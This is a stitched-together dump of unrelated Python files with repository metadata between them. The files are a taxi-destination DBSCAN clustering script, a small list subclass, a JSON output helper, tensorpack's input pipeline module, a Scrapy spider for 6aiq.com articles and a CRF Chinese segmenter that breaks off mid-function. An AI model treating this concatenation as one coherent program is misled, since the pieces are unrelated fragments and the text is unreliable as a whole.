patched_data_meta_write_request=models.PatchedDataMetaWriteRequest(deleted_frames=ids),
)
def get_issues(self) -> List[Issue]:
return [
Issue(self._client, m)
for m in get_paginated_collection(
self._client.api_client.issues_api.list_endpoint, job_id=str(self.id)
)
]
def get_commits(self) -> List[models.IJobCommit]:
return get_paginated_collection(self.api.list_commits_endpoint, id=self.id)
class JobsRepo(
_JobRepoBase,
ModelListMixin[Job],
ModelRetrieveMixin[Job],
):
_entity_type = Job
|
[
"noreply@github.com"
] |
shalevy1.noreply@github.com
|
baa584d709e3e9f8873f169168c932580fee809d
|
918cde4a00ba0aaf4bdce92b5767a5353ca75f15
|
/destination_prediction_porto/claster_dbscan_OD.py
|
7c99a712288acef1d2380a16f7f4c4e10f885724
|
[] |
no_license
|
haocdp/trajectory_handle
|
112a74eecd3f040bbadf30a485fcaeb922bd8519
|
89a68f8f930cca4a4a9f14ead1b234efe06a6479
|
refs/heads/master
| 2022-01-15T08:48:37.512374
| 2019-05-09T07:36:01
| 2019-05-09T07:36:01
| 155,372,147
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,646
|
py
|
# !/usr/bin/env python3
import numpy as np
import matplotlib.pyplot as plt
import json
import time
from sklearn.cluster import DBSCAN
from sklearn import metrics
from collections import Counter
from ast import literal_eval
import csv
linux_path = "/root/TaxiData_Porto"
window_path = "K:/毕业论文/TaxiData_Porto"
file_path = window_path
def load_dataset(filename):
destination_dataSet = []
file = csv.reader(open(file_path + "/train.csv", 'r'))
flag = False
count = 0
for line in file:
if not flag:
flag = not flag
continue
if line[-2] == 'True':
continue
trajectory = literal_eval(line[-1])
if len(trajectory) >= 10 and count % 5 == 0:
destination_dataSet.append(trajectory[-1])
count += 1
return destination_dataSet
def main():
destination_dataSet = load_dataset(file_path + '/train.csv')
destination_dataset_array = np.array(destination_dataSet)
destination_db = DBSCAN(eps=0.0002, min_samples=40, metric='haversine').fit(destination_dataset_array)
destination_labels = destination_db.labels_
'''
destination points cluster
'''
destination_new_dataset = []
destination_new_labels = []
destination_list_labels = list(destination_labels)
destination_dict_lables = Counter(destination_list_labels)
for key, value in enumerate(destination_list_labels):
if value == -1 or destination_dict_lables[value] < 10:
continue
destination_new_dataset.append(destination_dataSet[key])
destination_new_labels.append(value)
destination_new_dataset = np.array(destination_new_dataset)
destination_dict_lables = Counter(destination_new_labels)
print(destination_dict_lables)
np.save(file_path + "/cluster/cluster_dataset", destination_new_dataset)
np.save(file_path + "/cluster/destination_labels", destination_new_labels)
n_clusters_ = len(set(destination_labels)) - (1 if -1 in destination_labels else 0)
print('Estimated number of destination clusters: %d' % n_clusters_)
# import pylab
# # plt.figure()
# # plt.scatter(destination_new_dataset[:, 0], destination_new_dataset[:, 1], c=destination_new_labels, s=10, cmap='seismic')
# # plt.title('destination cluster')
# # plt.show()
# pylab.scatter(destination_new_dataset[:, 0], destination_new_dataset[:, 1], c=destination_new_labels, s=10, cmap='seismic')
# pylab.savefig('cluster', format='pdf')
if __name__ == '__main__':
start = time.clock()
main()
end = time.clock()
print('finish all in %s' % str(end - start))
|
[
"1134675798@qq.com"
] |
1134675798@qq.com
|
a8a9b73dd22b86c1ad0d7bc1ed452cc1a6766292
|
840526f024ca1653b1d8c3be1afa883f23c40616
|
/0x0A-python-inheritance/1-my_list.py
|
29533b3718e30cd3d383686a2067c682b8840e9d
|
[] |
no_license
|
gotarazo/holbertonschool-higher_level_programming
|
1bc414f2cf5ac92321e5cf517f065dc0b5827c65
|
45b002ca769d8d656e5e69d1a6289f3b93b0fb56
|
refs/heads/master
| 2023-03-11T05:17:16.567731
| 2021-03-03T05:01:48
| 2021-03-03T05:01:48
| 319,824,353
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 247
|
py
|
#!/usr/bin/python3
"""Defines the extended version of list"""
class MyList(list):
"""Represent a extended version of MyList"""
def print_sorted(self):
"""Print the list but sorted (ascending sort)"""
print(sorted(self))
|
[
"2272@holbertonschool.com"
] |
2272@holbertonschool.com
|
f0a944154f5896ac8f4bd18c9a2c110cba079dcf
|
3c58732a68a08738c01dda0157699e1361886abc
|
/common/core/output.py
|
3c7d2bf5393e583a055f4e5efa05d290dd6de88e
|
[] |
no_license
|
heewinkim/zappa-framework
|
4c3449ef6d616ad6b74aae08afb695f0407f7e94
|
bfa9af932014f0906143194b0bd3fe4cd2fb5112
|
refs/heads/master
| 2020-11-23T20:01:01.463002
| 2019-12-13T09:21:13
| 2019-12-13T09:21:13
| 227,800,247
| 2
| 0
| null | 2019-12-13T09:21:42
| 2019-12-13T09:11:44
|
Python
|
UTF-8
|
Python
| false
| false
| 6,142
|
py
|
# -*- coding: utf-8 -*-
"""
===============================================
output module
===============================================
========== ====================================
========== ====================================
Module output module
Date 2019-03-26
Author hian
Comment `관련문서링크 <>`_
========== ====================================
*Abstract*
* data output 처리를 담당합니다.
* 최종 아웃풋을 json 형태로 제공
* set_error(e) 메소드 제공
>>> EXAMPLE
output = Output()
output.set_output(a)
output.set_success()
print(output.get_output())
# {"statusCode": 200, "message": "success", "a": 0, "b": [1, 2, 3]}
print(output.get_output())
# {"statusCode": None, "message": None, "a": None, "b": None}
===============================================
"""
import json
import numpy as np
from .error import *
from .singleton import Singleton
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
return json.JSONEncoder.default(self, obj)
class Output(object,metaclass=Singleton):
def __init__(self,top_keys=['statusCode','message']):
self.output={k: None for k in top_keys}
self.default_obj=None
self.reset()
def reset(self)-> None:
"""
최상단의 object 값들을 None로 리셋합니다.
:return:
"""
if self.default_obj:
self.output = self.default_obj.copy()
elif self.output:
self.output = self.output.fromkeys(self.output,None)
else:
self.output = {k: None for k in ['statusCode','message']}
def set_default(self,**kwargs):
"""
keys,default_value를 받아 키를 하나의 값으로 초기화 하거나
dict_obj 값을 받아 output 디폴트 값을 update 합니다
keys: 디폴트로 지정하고자 하는 key 리스트(default_value로 초기화 됨)
default_value: keys를 넘겼을때 초기화되는 값
dict_obj: dictionary 형태로 값을 받아 디폴드 값으로 지정
:return: None
"""
if 'keys' in kwargs:
keys = kwargs.get('keys')
default_value = kwargs.get('default_value',None)
self.default_obj = {k: default_value for k in keys}
elif 'dict_obj' in kwargs:
self.default_obj = kwargs.get('dict_obj')
else:
raise Error(ERROR_TYPES.PREPROCESSING_ERROR,'Invalid parameter offered - set_default in Output')
self.output = self.default_obj.copy()
def set_output(self,output:dict) -> None:
"""
dictionary 형태의 아웃풋을 저장합니다.
python dict.update와 동일한 기능을 제공합니다.
기존값을 업데이트 또는 새롤운 키-값 쌍을 추가합니다.
:param output: dictionary
:return: None
"""
self.output.update(output)
def get_output(self):
"""
output값을 반환 및 리셋합니다.
:return: json format data
"""
output = json.dumps(self.output,cls=NumpyEncoder)
self.reset()
return output
def set_error(self,e):
"""
에러에 대한 후처리를 합니다.
:param e: error type
"""
if hasattr(e,'err_type'):
if e.err_type.name in ERROR_TYPES.__members__ and e.err_type.value in ERROR_TYPES._value2member_map_:
statusCode = e.err_type.value >> 16
# 400 ERROR
if statusCode == 4:
self.output['statusCode'] = 400
self.output['message'] = str(e)
# 500 ERROR
elif statusCode == 5:
self.output['statusCode'] = 500
self.output['message'] = str(e)
# 600 ERROR
elif statusCode == 6:
self.output['statusCode'] = 200
self.output['message'] = str(e)
# 700 ERROR
elif statusCode == 7:
self.output['statusCode'] = 500
self.output['message'] = '[RUNTIME_ERROR] Unexpected Error Occurred.'
else:
self.output['statusCode'] = 500
self.output['message'] = '[RUNTIME_ERROR] Unexpected Error Occurred.'
else:
if hasattr(e, 'code') and e.code == 400:
self.output['statusCode'] = 400
self.output['message'] = '[REQUEST_ERROR] Bad Request.'
elif hasattr(e, 'code') and e.code == 401:
self.output['statusCode'] = 401
self.output['message'] = '[REQUEST_ERROR] Method not allowed.'
elif hasattr(e, 'code') and e.code == 402:
self.output['statusCode'] = 402
self.output['message'] = '[REQUEST_ERROR] Unauthorized request.'
elif hasattr(e, 'code') and e.code == 403:
self.output['statusCode'] = 403
self.output['message'] = '[REQUEST_ERROR] Forbidden Resource.'
elif hasattr(e, 'code') and e.code == 404:
self.output['statusCode'] = 404
self.output['message'] = '[RESOURCE_ERROR] Invalid Resource requested.'
elif hasattr(e, 'code') and e.code == 405:
self.output['statusCode'] = 405
self.output['message'] = '[REQUEST_ERROR] Method not allowed.'
else:
self.output['statusCode'] = 500
self.output['message'] = '[RUNTIME_ERROR] Unexpected Error Occurred.'
def set_success(self, status=200, message='success'):
"""
성공처리
:param status: 상태코드
:param message: 메세지
"""
self.output['statusCode'] = status
self.output['message'] = message
def return_output(self,result):
self.set_output(result)
self.set_success()
return self.get_output()
|
[
"heewin.kim@gmail.com"
] |
heewin.kim@gmail.com
|
2e97e9e87c5e325f0bfa0da62d4b18fee2b245e1
|
6a8def58463c194c1da44a4add13f887aec15251
|
/app.py
|
82c85c623734133630e91fae54de59d30fc9ab86
|
[] |
no_license
|
mykey007/python_learning
|
8329b5f6042fddd0f8ee3c71a5ebc903aa899979
|
8993f968d04b1d42836f3e2106e27e9a9ee633c4
|
refs/heads/master
| 2020-03-27T20:10:58.648940
| 2018-09-02T03:55:55
| 2018-09-02T03:55:55
| 147,046,034
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 604
|
py
|
character_name = "dink"
character_species = "cat"
character_age = "14"
print(" /\\")
print(" / \\")
print(" / \\")
print("/______\\")
#print(len(character_age))
#print(89 * 4322234)
#name = input("Type your name!")
#print("Hi" + name)
#num1 = input("Enter a number:")
#num2 = input("Enter another number:")
#result = float(num1) + float(num2)
#print(result)
color = input("Enter a number: ")
plural_noun = input("Enter a plural noun: ")
celebrity = input("Enter a celebrity: ")
print("Roses are " + color)
print(plural_noun + " are blue")
print("I love " + celebrity)
print("How about you???")
|
[
"mmallowe@gmail.com"
] |
mmallowe@gmail.com
|
6e6a4f6d6ad6874670c092f9a00f1ea32ee4f4db
|
d8e42e90bcadc5f821577149e4c9f869da77acc8
|
/tensorpack/input_source/input_source.py
|
88cdcb004ccae12684af7364d5970a22fe7fd48c
|
[
"Apache-2.0"
] |
permissive
|
VladMiryaha/tensorpack
|
10431dbf2d727eca9a98fc6e2185d18e65a1b665
|
fe33c8338c58b5aca2f13463de827cbd582b6bf1
|
refs/heads/master
| 2021-03-31T02:15:26.748820
| 2018-03-13T09:43:18
| 2018-03-13T09:43:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,427
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: input_source.py
import tensorflow as tf
try:
from tensorflow.python.ops.data_flow_ops import StagingArea
except ImportError:
pass
from contextlib import contextmanager
from itertools import chain
from six.moves import range, zip
import threading
from .input_source_base import InputSource
from ..dataflow import DataFlow, MapData, RepeatedData, DataFlowTerminated
from ..tfutils.summary import add_moving_summary
from ..tfutils.common import get_op_tensor_name
from ..tfutils.tower import get_current_tower_context
from ..utils import logger
from ..utils.concurrency import ShareSessionThread
from ..utils.develop import log_deprecated
from ..callbacks.base import Callback, CallbackFactory
from ..callbacks.graph import RunOp
__all__ = ['PlaceholderInput', 'FeedInput', 'FeedfreeInput',
'QueueInput', 'BatchQueueInput',
'DummyConstantInput', 'TensorInput',
'ZMQInput', 'TFDatasetInput',
'StagingInputWrapper', 'StagingInput']
def _get_reset_callback(df):
return CallbackFactory(setup_graph=lambda _: df.reset_state())
class PlaceholderInput(InputSource):
"""
Just produce placeholders as input tensors.
"""
def _setup(self, inputs):
self._all_placehdrs = [v.build_placeholder() for v in inputs]
def _get_input_tensors(self):
return self._all_placehdrs
class FeedInput(InputSource):
""" Input by iterating over a DataFlow and feed datapoints. """
class _FeedCallback(Callback):
def __init__(self, ds, placeholders):
self._ds = ds
self._itr = self._ds.get_data()
self._placeholders = placeholders
def _before_run(self, _):
dp = next(self._itr)
assert len(dp) == len(self._placeholders), "[FeedInput] datapoints and inputs are of different length!"
feed = dict(zip(self._placeholders, dp))
return tf.train.SessionRunArgs(fetches=[], feed_dict=feed)
def _reset(self):
self._itr = self._ds.get_data()
def __init__(self, ds, infinite=True):
"""
Args:
ds (DataFlow): the input DataFlow.
infinite (bool): When set to False, will raise StopIteration when
ds is exhausted.
"""
assert isinstance(ds, DataFlow), ds
self.ds = ds
if infinite:
self._iter_ds = RepeatedData(self.ds, -1)
else:
self._iter_ds = self.ds
def _size(self):
return self.ds.size()
def _setup(self, inputs):
# placeholders as input are always safe to reuse.
self._all_placehdrs = [v.build_placeholder_reuse() for v in inputs]
self._cb = self._FeedCallback(self._iter_ds, self._all_placehdrs)
def _get_input_tensors(self):
return self._all_placehdrs
def _reset_state(self):
self._cb._reset()
def _get_callbacks(self):
return [self._cb, _get_reset_callback(self._iter_ds)]
class FeedfreeInput(InputSource):
""" Abstract base for input without feed,
e.g. by queue or other operations. """
def _reset_state(self):
pass
# TODO enqueu_many? https://github.com/tensorflow/tensorflow/issues/7817#issuecomment-282053155
class EnqueueThread(ShareSessionThread):
def __init__(self, queue, ds, placehdrs):
super(EnqueueThread, self).__init__()
self.name = 'EnqueueThread ' + queue.name
self.daemon = True
self.dataflow = ds
self.queue = queue
self.placehdrs = placehdrs
self.op = self.queue.enqueue(self.placehdrs)
self.close_op = self.queue.close(cancel_pending_enqueues=True)
self._lock = threading.Lock()
# self._size = queue.size()
def run(self):
with self.default_sess():
try:
self.reinitialize_dataflow()
while True:
# pausable loop
self._lock.acquire()
self._lock.release()
dp = next(self._itr)
feed = dict(zip(self.placehdrs, dp))
# _, sz = sess.run([self.op, self._sz], feed_dict=feed)
self.op.run(feed_dict=feed)
except (tf.errors.CancelledError, tf.errors.OutOfRangeError, DataFlowTerminated):
pass
except Exception as e:
if isinstance(e, RuntimeError) and 'closed Session' in str(e):
pass
else:
logger.exception("Exception in {}:".format(self.name))
finally:
try:
self.close_op.run()
except Exception:
pass
logger.info("{} Exited.".format(self.name))
def reinitialize_dataflow(self):
self._itr = self.dataflow.get_data()
def pause(self):
self._lock.acquire()
def resume(self):
self._lock.release()
class QueueInput(FeedfreeInput):
""" Enqueue datapoints from a DataFlow to a TF queue.
And the model receives dequeued tensors.
Calling :meth:`reset_state()` will clear the queue and reset the dataflow.
"""
def __init__(self, ds, queue=None):
"""
Args:
ds(DataFlow): the input DataFlow.
queue (tf.QueueBase): A :class:`tf.QueueBase` whose type
should match the corresponding InputDesc of the model.
Defaults to a FIFO queue of size 50.
"""
assert isinstance(ds, DataFlow), ds
self.queue = queue
self.ds = ds
self._inf_ds = RepeatedData(ds, -1)
self._started = False
def _size(self):
return self.ds.size()
def _setup(self, inputs):
self._input_placehdrs = [v.build_placeholder_reuse() for v in inputs]
assert len(self._input_placehdrs) > 0, \
"QueueInput has to be used with some inputs!"
with self.cached_name_scope():
if self.queue is None:
self.queue = tf.FIFOQueue(
50, [x.dtype for x in self._input_placehdrs],
name='input_queue')
logger.info("Setting up the queue '{}' for CPU prefetching ...".format(self.queue.name))
self.thread = EnqueueThread(self.queue, self._inf_ds, self._input_placehdrs)
self._dequeue_op = self.queue.dequeue(name='dequeue_for_reset')
def refill_queue(self):
"""
Clear the queue, then call dataflow.get_data() again and fill into the queue.
"""
self.thread.pause() # pause enqueue
opt = tf.RunOptions()
opt.timeout_in_ms = 2000 # 2s
sess = tf.get_default_session()
# dequeue until empty
try:
while True:
sess.run(self._dequeue_op, options=opt)
except tf.errors.DeadlineExceededError:
pass
# reset dataflow, start thread
self.thread.reinitialize_dataflow()
self.thread.resume()
def _create_ema_callback(self):
"""
Create a hook-only callback which maintain EMA of the queue size.
Also tf.summary.scalar the EMA.
"""
with self.cached_name_scope():
# in TF there is no API to get queue capacity, so we can only summary the size
size = tf.cast(self.queue.size(), tf.float32, name='queue_size')
size_ema_op = add_moving_summary(size, collection=None, decay=0.5)[0].op
return RunOp(
lambda: size_ema_op,
run_before=False,
run_as_trigger=False,
run_step=True)
def _get_callbacks(self):
from ..callbacks.concurrency import StartProcOrThread
cb = StartProcOrThread(self.thread)
return [cb, self._create_ema_callback(), _get_reset_callback(self._inf_ds)]
def _get_input_tensors(self):
with tf.device('/cpu:0'), self.cached_name_scope():
ret = self.queue.dequeue(name='input_deque')
if isinstance(ret, tf.Tensor): # only one input
ret = [ret]
assert len(ret) == len(self._input_placehdrs)
for qv, v in zip(ret, self._input_placehdrs):
qv.set_shape(v.get_shape())
return ret
class BatchQueueInput(QueueInput):
""" Enqueue datapoints from a DataFlow to a TF queue.
And the model receives batches formed by concatenating
dequeued tensors.
"""
def __init__(self, ds, batch_size, queue=None):
"""
Args:
ds(DataFlow): the input DataFlow.
batch_size(int): the batch size.
queue (tf.QueueBase): A :class:`tf.QueueBase` whose type
should match the corresponding InputDesc of the model.
Defaults to a FIFO queue of size 3000.
"""
super(BatchQueueInput, self).__init__(ds, queue)
self.batch_size = int(batch_size)
def _size(self):
return self.ds.size() // self.batch_size
def _setup(self, inputs):
logger.info("Setting up the queue for CPU prefetching ...")
self.input_placehdrs = [v.build_placeholder_reuse() for v in inputs]
assert len(self.input_placehdrs) > 0, \
"BatchQueueInput has to be used with some InputDesc!"
# prepare placeholders without the first dimension
placehdrs_nobatch = []
for p in self.input_placehdrs:
placehdrs_nobatch.append(tf.placeholder(
dtype=p.dtype, shape=p.get_shape().as_list()[1:],
name=get_op_tensor_name(p.name)[0] + '-nobatch'))
# dequeue_many requires fully-defined shapes
shape_err = "Use of BatchQueueInput requires inputs to have fully-defined "
"shapes except for the batch dimension"
shapes = []
for p in placehdrs_nobatch:
assert p.get_shape().is_fully_defined(), shape_err
shapes.append(p.get_shape())
with self.cached_name_scope():
if self.queue is None:
self.queue = tf.FIFOQueue(
3000, [x.dtype for x in self.input_placehdrs],
shapes=shapes,
name='input_queue')
for shp in self.queue.shapes:
assert shp.is_fully_defined(), shape_err
self.thread = EnqueueThread(self.queue, self._inf_ds, placehdrs_nobatch)
def _get_input_tensors(self):
with tf.device('/cpu:0'), self.cached_name_scope():
ret = self.queue.dequeue_many(self.batch_size, name='input_deque')
if isinstance(ret, tf.Tensor): # only one input
ret = [ret]
assert len(ret) == len(self.input_placehdrs)
for qv, v in zip(ret, self.input_placehdrs):
shp = v.get_shape().as_list()
shp[0] = self.batch_size
qv.set_shape(shp)
return ret
# TODO tensor inputs can be drained? look at the new dataset API.
class TensorInput(FeedfreeInput):
""" Input from a list of tensors, e.g. a TF data reading pipeline.
The PTB training example shows how to use it.
"""
def __init__(self, get_tensor_fn, size=None):
"""
Args:
get_tensor_fn: a function which returns a list of input tensors
when called. It will be called under a TowerContext.
size(int): size of this input. Use None to leave it undefined.
"""
self.get_tensor_fn = get_tensor_fn
if size is not None:
size = int(size)
assert size > 0
self._fixed_size = size
def _setup(self, inputs_desc):
self._desc = inputs_desc
def _size(self):
if self._fixed_size is None:
raise NotImplementedError("size of TensorInput is undefined!")
return self._fixed_size
def _get_input_tensors(self):
with self.cached_name_scope():
ret = self.get_tensor_fn()
assert len(ret) == len(self._desc), "{} != {}".format(len(ret), len(self._desc))
return ret
class DummyConstantInput(TensorInput):
""" Input with a constant zero tensor placed on GPU.
Useful for debugging performance issues """
def __init__(self, shapes):
"""
Args:
shapes (list[list]): a list of fully-sepcified shapes.
"""
self.shapes = shapes
logger.warn("Using dummy input for debug!")
def fn():
tlist = []
ctx = get_current_tower_context()
assert ctx is not None
assert len(self.shapes) == len(self._desc)
for idx, p in enumerate(self._desc):
tlist.append(tf.constant(
0, dtype=p.type,
name='dummy-{}-{}'.format(p.name, ctx.index),
shape=self.shapes[idx]))
return tlist
super(DummyConstantInput, self).__init__(fn)
class ZMQInput(TensorInput):
"""
Recv tensors from a ZMQ endpoint, with ops from https://github.com/tensorpack/zmq_ops.
It works with :meth:`dataflow.remote.send_dataflow_zmq(format='zmq_op')`.
"""
def __init__(self, end_point, hwm, bind=True):
"""
Args:
end_point (str):
hwm (int):
"""
self._end_point = end_point
self._hwm = int(hwm)
self._bind = bind
def fn():
ret = self._zmq_pull_socket.pull()
assert len(ret) == len(self._desc)
for qv, v in zip(ret, self._desc):
qv.set_shape(v.shape)
return ret
super(ZMQInput, self).__init__(fn)
def _setup(self, inputs_desc):
assert len(inputs_desc) > 0, \
"ZMQInput has to be used with InputDesc!"
self._desc = inputs_desc
import zmq_ops
self._zmq_pull_socket = zmq_ops.ZMQPullSocket(
self._end_point,
[x.type for x in inputs_desc],
hwm=self._hwm,
bind=self._bind)
class TFDatasetInput(FeedfreeInput):
"""
Use a :class:`tf.contrib.data.Dataset` instance as input.
Note:
In training, the dataset should be infinite (use :func:`repeat()`).
"""
def __init__(self, dataset):
"""
Args:
dataset (tf.contrib.data.Dataset):
"""
self._dataset = dataset
def _setup(self, inputs_desc):
self._desc = inputs_desc
types = self._dataset.output_types
desc_types = tuple([k.type for k in inputs_desc])
assert len(types) == len(desc_types), \
"Dataset and InputDesc has different length! {} != {}".format(
len(types), len(desc_types))
assert types == desc_types, \
"Types of dataset and InputDesc don't match! {} != {}".format(
str(types), str(desc_types))
shapes = self._dataset.output_shapes
desc_shapes = [k.shape for k in inputs_desc]
for idx, (s1, s2) in enumerate(zip(shapes, desc_shapes)):
s2 = tf.TensorShape(s2)
assert s2.is_compatible_with(s1), \
"InputDesc '{}' has incompatible shape with dataset! {} vs {}".format(
inputs_desc[idx].name, s2, s1)
self._iterator = self._dataset.make_initializable_iterator()
self._init_op = self._iterator.initializer
def _reset_state(self):
self._init_op.run()
def _get_input_tensors(self):
desc_shapes = [k.shape for k in self._desc]
ret = self._iterator.get_next()
assert len(ret) == len(desc_shapes)
for t, shp in zip(ret, desc_shapes):
t.set_shape(shp)
return ret
@staticmethod
def dataflow_to_dataset(df, types):
"""
Wrap a dataflow to tf.data.Dataset.
Will also reset the dataflow.
If for training, you'll need to add `.repeat()` on the returned
dataset, if the dataflow iterator can terminate.
Args:
df (DataFlow)
types([tf.DType])
Returns:
(tf.data.Dataset)
"""
assert isinstance(df, DataFlow), df
assert isinstance(types, (list, tuple)), types
df = MapData(df, lambda dp: tuple(dp))
df.reset_state()
ds = tf.data.Dataset.from_generator(
df.get_data, tuple(types))
return ds
class StagingInput(FeedfreeInput):
"""
A wrapper around a feedfree input,
to prefetch the input in StagingArea (on GPUs).
"""
class StagingCallback(Callback):
"""
A callback registered by this input source, to make sure stage/unstage
is run at each step.
"""
def __init__(self, input, nr_stage):
self.nr_stage = nr_stage
self._input = input
self._initialized = False
def _setup_graph(self):
self.stage_op = self._input._get_stage_op()
unstage_op = self._input._get_unstage_op()
self.fetches = tf.train.SessionRunArgs(
fetches=[self.stage_op, unstage_op])
def _prefill(self):
logger.info("Pre-filling StagingArea ...")
for k in range(self.nr_stage):
self.stage_op.run()
logger.info("Successfully put {} element{} to StagingArea.".format(
self.nr_stage, "s" if self.nr_stage > 1 else ""))
def _before_run(self, ctx):
# This has to happen once, right before the first iteration.
if not self._initialized:
self._initialized = True
self._prefill()
return self.fetches
def __init__(self, input, towers=None, nr_stage=1, device=None):
"""
Args:
input (FeedfreeInput):
nr_stage: number of elements to prefetch into each StagingArea, at the beginning.
Since enqueue and dequeue are synchronized, prefetching 1
element should be sufficient.
towers: deprecated
device (str or None): if not None, place the StagingArea on a specific device. e.g., '/cpu:0'.
Otherwise, they are placed under where `get_inputs_tensors`
gets called, which could be unspecified in case of simple trainers.
"""
assert isinstance(input, FeedfreeInput), input
self._input = input
if towers is not None:
log_deprecated("StagingInput(towers=)", "Devices are handled automatically.", "2018-03-31")
self._nr_stage = nr_stage
self._areas = []
self._stage_ops = []
self._unstage_ops = []
self._device = device
def _setup(self, inputs):
self._input.setup(inputs)
with self.cached_name_scope():
pass # just to cache the correct ns to use
def _get_callbacks(self):
cbs = self._input.get_callbacks()
# this callback has to happen after others, so StagingInput can be stacked together
cbs.append(
StagingInput.StagingCallback(self, self._nr_stage))
return cbs
def _size(self):
return self._input.size()
@contextmanager
def _device_ctx(self):
if not self._device:
yield
else:
with tf.device(self._device):
yield
def _get_input_tensors(self):
with self.cached_name_scope(), self._device_ctx():
inputs = self._input.get_input_tensors()
# Putting variables to stagingarea will cause trouble
dtypes = []
for idx in range(len(inputs)):
dtype = inputs[idx].dtype
if dtype.base_dtype != dtype: # is reference type
inputs[idx] = tf.identity(inputs[idx])
dtypes.append(dtype.base_dtype)
# TODO tensorflow/benchmarks use static shapes here,
# though it doesn't seem to help. We can use it when it's known.
stage = StagingArea(dtypes, shapes=None)
# put & get automatically inherit the name scope from the area
self._stage_ops.append(stage.put(inputs))
self._areas.append(stage)
outputs = stage.get()
if isinstance(outputs, tf.Tensor): # when size=1, TF doesn't return a list
outputs = [outputs]
for vin, vout in zip(inputs, outputs):
vout.set_shape(vin.get_shape())
self._unstage_ops.append(outputs)
# self._size_ops.append(stage.size())
return outputs
def _get_stage_op(self):
with self.cached_name_scope():
return tf.group(*self._stage_ops)
def _get_unstage_op(self):
with self.cached_name_scope():
all_outputs = list(chain.from_iterable(self._unstage_ops))
return tf.group(*all_outputs)
# for debugging only
def _create_ema_callback(self):
def create_ema_op():
with self.cached_name_scope():
avg_size = tf.truediv(tf.add_n(self._size_ops), len(self._size_ops), name='avg_stagingarea_size')
return add_moving_summary(avg_size, collection=None)[0].op
return RunOp(
create_ema_op,
run_before=False,
run_as_trigger=False,
run_step=True)
StagingInputWrapper = StagingInput
|
[
"ppwwyyxxc@gmail.com"
] |
ppwwyyxxc@gmail.com
|
11b00cf27e6a9fee9230b5a1559295209753ad1c
|
f2ae5eb0ef13040c9311be57b59c4998c33280d7
|
/fintech/fintech/spiders/其他/aiq_ml.py
|
c690dbfd5134665ac36a12f7cafcab2674f906d9
|
[] |
no_license
|
ReggieFan/spider
|
70f1ec49b01201b3a4d2f2abc051915ca0f9aec2
|
68be9032897f8911ed0fc94d8cb90115937a7d44
|
refs/heads/master
| 2020-07-06T13:06:18.264650
| 2019-08-18T16:08:43
| 2019-08-18T16:08:43
| 203,026,643
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,048
|
py
|
# -*- coding: utf-8 -*-
import scrapy
from fintech.items.antfin import AntfinItem #这里不知道为什么报错,都是运行没问题
from scrapy.http import Request
from urllib.parse import quote
from bs4 import BeautifulSoup
class AiqMlSpider(scrapy.Spider):
name = 'aiq_ml'
allowed_domains = ['6aiq.com']
start_urls = ['http://6aiq.com/']
def start_requests(self):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}
num=40
for i in range(1,41):
yield Request('http://www.6aiq.com/domain/machine_learning?p='+str(i),
self.parse,headers=headers)
print('AIQ机器学习:' + '%.2f' % ((i-1) /num * 100) + "%")
def parse(self, response):
bsObj = BeautifulSoup(response.text, "lxml")
bs = bsObj.find(attrs={'class': 'article-list list'})
for j in bs.find_all('h2'):
yield Request(j.a.get('href'),self.parse_2,
meta={'url':j.a.get('href')})
def parse_2(self,response):
# print('parse2')
bsObj = BeautifulSoup(response.text, "lxml")
# print (response.text)
bs = bsObj.find(attrs={'class': 'content-reset article-content'})
content=''
for i in bs.find_all('p')[:-2]:
content = f'{content}{i.text}'
title = bsObj.find(attrs={'class':'article-title'}).text
content = content.replace("\n", "").replace("\r", "").replace(" ", "").replace("\t", "").replace("\xa0", "").replace('\u3000','')
# print ('标题:'+title+'内容:'+content)
item = AntfinItem()
item['type'] = 2
item['url'] = response.meta['url']
item['title'] = title.replace('\n', '').replace("\r", "").replace(" ", "").replace("\t", "").replace("\xa0", "").replace('\u3000','')
item['summary'] = content[:60]
item['content'] = content
item['vendor'] = ''
return item
|
[
"btxu@scut.edu.cn"
] |
btxu@scut.edu.cn
|
d356594c618e74947371466d15cb34018a2b1020
|
50ac1dca3fac05f4d9393194190a754ff43a67d8
|
/deepnlp/segmenter.py
|
f82688200b9334cc4aaebdba3aace2ec1db10d29
|
[
"MIT"
] |
permissive
|
sweetcard/deepnlp
|
304a9716fbc6453328d4ede3f2a61948805cb0f1
|
a1d686756542a48cd6661bba0637448d9cfa46dd
|
refs/heads/master
| 2021-09-16T08:36:39.119709
| 2017-12-24T13:54:13
| 2017-12-24T13:54:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,354
|
py
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
# B, M, E, S: Beginning, Middle, End, Single 4 tags
import sys,os
import CRFPP
from model_util import registered_models
# linear chain CRF model path, need str input, convert unicode to str in python2, <str> object in python3
pkg_path = os.path.dirname(os.path.abspath(__file__))
version_info = "py3" if (sys.version_info>(3,0)) else "py2"
DEFAULT_MODEL = str(os.path.join(pkg_path, "segment/models/zh/crf_model"))
class Tokenizer(object):
def __init__(self, model_path = DEFAULT_MODEL):
self.model = CRFPP.Tagger("-m " + model_path)
def seg(self, text):
'''
text: String, text to be segmented;
model: path of pretrained CRFPP model,
'''
segList = []
model = self.model
model.clear()
for char in text.strip(): # char in String
char = char.strip()
if char:
input_char = (char + "\to\tB").encode('utf-8') if (version_info == "py2") else (char + "\to\tB")
model.add(input_char)
model.parse()
size = model.size()
xsize = model.xsize()
word = ""
for i in range(0, size):
for j in range(0, xsize):
char = model.x(i, j).decode('utf-8') if (version_info == "py2") else model.x(i, j)
tag = model.y2(i)
if tag == 'B':
word = char
elif tag == 'M':
word += char
elif tag == 'E':
word += char
segList.append(word)
word = ""
else: # tag == 'S'
word = char
segList.append(word)
word = ""
return segList
def load_model(name = 'zh'):
''' model_path e.g.: ./segment/models/zh/crf_model
Loadg pretrained subfield models...
'''
registered_model_list = registered_models[0]['segment']
if name not in registered_model_list:
